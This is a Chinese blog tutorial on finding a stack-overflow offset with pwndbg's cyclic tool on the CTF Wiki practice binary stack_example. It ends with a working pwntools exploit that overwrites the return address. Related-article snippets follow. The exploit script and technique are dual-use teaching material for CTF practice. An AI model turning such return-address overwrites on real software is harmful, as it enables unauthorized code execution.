快速计算栈溢出长度

最新推荐文章于 2023-04-22 21:14:27 发布
最新推荐文章于 2023-04-22 21:14:27 发布
阅读量1.5k 收藏 5
点赞数
分类专栏: pwn 文章标签: vim linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kelxlz/article/details/121571846
版权
  • Author:ZERO-A-ONE
  • Date:2021-11-27

之前看到网上很多在编写栈溢出的时候计算栈溢出长度的文章,很多工具或者方法放到现在以及没有办法使用了,我经常使用的工具是pwndbg里面调用pwntools的cyclic工具

我们以CTF Wiki里面的示例程序stack-example为例子

首先用IDA找到溢出函数gets的下一个地址为0x804849f,打断点

b *0x804849f

然后使用cyclic工具生成测试字符串

pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab

然后运行将测试字符串输入其中,然后一直按n运行至崩溃处,发现GDB报错

Invalid address 0x61616167

观察EIP的值为

*EIP  0x61616167 ('gaaa')

然后使用工具即可计算出栈溢出的长度

pwndbg> cyclic -l 'gaaa'
24

然后可以编写EXP:

##coding=utf8
from pwn import *
## 构造与程序交互的对象
sh = process('./stack_example')
success_addr = 0x08048456
## 构造payload
payload = b'a' * 24 + p32(success_addr)
print(p32(success_addr))
## 向程序发送字符串
sh.sendline(payload)
## 将代码交互转换为手工交互
sh.interactive()
ZERO-A-ONE
关注
专栏目录
花式栈溢出技巧----stack pivoting/frame faking
qq_42192672的博客
10-14 1301
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/                   https://www.jianshu.com/p/c53627895330 1.stack pivoting 转移堆  以 X-CTF Quals 2016 - b0verfl0w 为例学习 #若可溢出...
栈溢出----基础rop
qq_42192672的博客
10-12 1189
学习文献:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic_rop/ 1. 栈溢出基本原理就不写了 列举一下常见的危险函数: 输入 gets,直接读取一行,忽略'\x00' scanf vscanf 输出 sprintf 字符串 strcpy,字符串复制,遇到'\x00'停止 st...
springboot运行时内存溢出_栈溢出的检测
weixin_39533896的博客
10-27 2015
说到stack(栈),大家很可能就会想起stack overflow(栈溢出),著名的程序问答网站http://stackoverflow.com 就是以此命名的。因为栈通常是从高地址向低地址增长的,因此"栈溢出"分为两种:超出低地址范围的overrun(上溢)和超出高地址范围的underrun(下溢),"上溢"主要是由过深的函数调用引起(比如递归调用):而"下溢"则会出现在数组/字符串越界的时候...
手动测量变量溢出长度
最新发布
yw__y的博客
04-22 158
报错的意思是跳转到0x62616164这步出错了,意思是没有这个位置,这个位置就是200个有序字符其中最先溢出的部分。只要知道这个地址时输入的第几个字符,就可以知道前面有多少个字符了。细心的人可能就会发现我输入的不是baad而是daab,这是因为机器的小端序存储,而这里溢出显示的也是小端序的,所以应该颠倒以下顺序,但是如果直接输入地址,就没这么麻烦了。输入start,设置断点在main函数,输入c继续运行,将生成的无序字符粘贴在输入框中,回车。是32位的,开启了nx保护。结果和上面的是一样的,
栈溢出笔记1.7 地址问题(2)
hustd10的博客
04-09 1006
1.6节中找到了kernel32.dll的基地址,这一节,来解决第二个重要问题,即解析kernel32.dll的导出表,找到LoadLibraryA和GetProcAddress的地址。DLL导出的函数信息位于导出表中,因此,首先,要在PE文件中找到导出表(IMAGE_EXPORT_DIRECTORY)的地址,这位于数据目录(IMAGE_DATA_DIRECTORY)中。而数据目录位于PE扩展头(I
栈溢出计算偏移量
weixin_62675330的博客
03-08 3902
栈溢出计算偏移量 一,GDB调试出偏移量 0x8048677 <main+95> lea eax, [esp + 0x1c] 0x804867b <main+99> mov dword ptr [esp], eax ► 0x804867e <main+102> call gets@plt 通过这一串汇编指令可以看出来,此时起始地址相对于esp的偏移为0x1c,只要查看这时候的esp和ebp的寄存器就可以知道偏移量为多少。
栈溢出不再怕:递归深度调节与控制实战
栈溢出是指程序在运行时栈空间耗尽,通常是由于递归深度超过了操作系统为程序分配的栈空间。在本章中,我们将简要介绍栈溢出的基础知识,并对递归深度进行初步的探索。 递归深度问题不仅涉及到程序设计的基本概念,...
VC++2010学习:栈溢出示例与Windows应用开发
当输入的字符串长度超过`buffer`的8个字节限制时,就会发生溢出,因为`strcpy`函数会一直复制直到遇到空字符或到达目标数组的末尾,而不会检查实际的字符串长度。 在VC++2010这样的集成开发环境中,开发人员需要...
Python递归优化秘技:避免栈溢出与性能提升的6大策略
在开始深入递归调用机制和栈溢出原理之前,我们需要了解递归的基本概念。 ## 1.1 递归函数的定义和作用 递归函数是一种在其定义中直接或间接调用自身的函数。它将复杂问题分解成更小的子问题,然后以相同的方式...
快速掌握缓冲区溢出:原理与安全教程
尽管函数并未直接调用,但由于栈溢出,程序的控制流被改变,导致why_here函数意外地被执行,显示出了"whyuhere?!"的信息。 理解这一现象需要深入理解C语言的底层机制,特别是与计算机体系结构相关的概念,如栈和...
顺序栈公用
10-27
在“顺序栈公用问题的解答”中,可能涉及的具体问题包括如何实现顺序栈的基本操作,如何处理栈溢出(当数组已满但还需压入元素)和栈下溢(当数组为空但还需弹出元素)的情况,以及如何优化这些操作的效率。...
cyclic查看缓冲区溢出长度
小龙在线
09-29 2795
read、gets等C函数对输入没有限制,如果有可以溢出的堆栈,就有缓冲区溢出漏洞。 方法一: 方法二: 使用pwntoolscyclic: 安装 $ apt-get update $ apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential $ pip install --upgrade pip $ pip install --upgrade pwntools 测试 cyclic
pwndbg 查看溢出大小
devil8123665的博客
09-16 2161
1、生成输入字符串 pwndbg> cyclic 200 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab 2、运行输入上面字符串 pwndb...
算数运算溢出判断代码
H.T.Yuan的博客
06-17 1111
以下代码未溢出返回true 反之false
【简单栈溢出使用Ida&&OD分析
Y1seco的博客
05-02 1432
文章目录源码IDA分析使用OD分析 源码 #include <stdio.h> #include <stdlib.h> #include <string.h> #define PASSWORD "1234567" int verify_password(char *password){ int authentication; char buffer[8]; authentication=strcmp(password, PASSWORD); strcpy(buf
linux 函数栈溢出,64位Linux下的栈溢出
weixin_30175731的博客
05-03 543
今天在看《捉虫日记》,其中讲解的Linux下的栈缓冲区溢出是32位机器的,和我的64位机器有些不同之处。下面是我在64位Linux (Ubuntu14) 下的栈缓冲区溢出实验的记录。首先是有溢出漏洞的程序,这个程序来自于《捉虫日记》。#includevoid overflow(char *arg){char buf[12];strcpy(buf, arg);}int main(int argc, ...
计算机软件技术基础:循环队列详解与栈队列操作
3. 应用场景:循环队列用于解决顺序队列的假溢出问题,即当顺序队列无法区分真正溢出(队列满)和尾指针超过头指针的循环情况时,循环队列提供了有效的解决方案。 4. 数据结构:课程内容涵盖了数据结构的基础,包括...
超出堆栈大小报错
前端路上坎坎坷坷,总有一天站在顶峰仰望世界!!!
10-30 642
原因:查看代码是否递归,或者重定向,导致无限循环,导致内存超过堆栈
linux64 溢出,64位Linux下的栈溢出
weixin_36383252的博客
05-12 472
from:http://packetstormsecurity.com/files/download/127007/64bit-overflow.pdf本文的目的是让大家学到64位缓冲区溢出的基础知识。 作者Mr.Un1k0d3rRingZer0Team摘要0x01x86和x86_64的区别0x02漏洞代码片段0x03触发溢出0x04控制RIP0x05跳入用户控制的缓冲区0x06执...
Jarvislevel2_x64--64位简单栈溢出
qq_43613144的博客
07-26 443
ROPgadget 查找可存储寄存器的代码 ROPgadget --binary level_x64(名字) --only 'pop|ret' | grep 'eax' 查找字符串 ROPgadget --binary rop --string "/bin/sh" 查找有int 0x80的地址 ROPgadget --binary rop --only 'int' ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值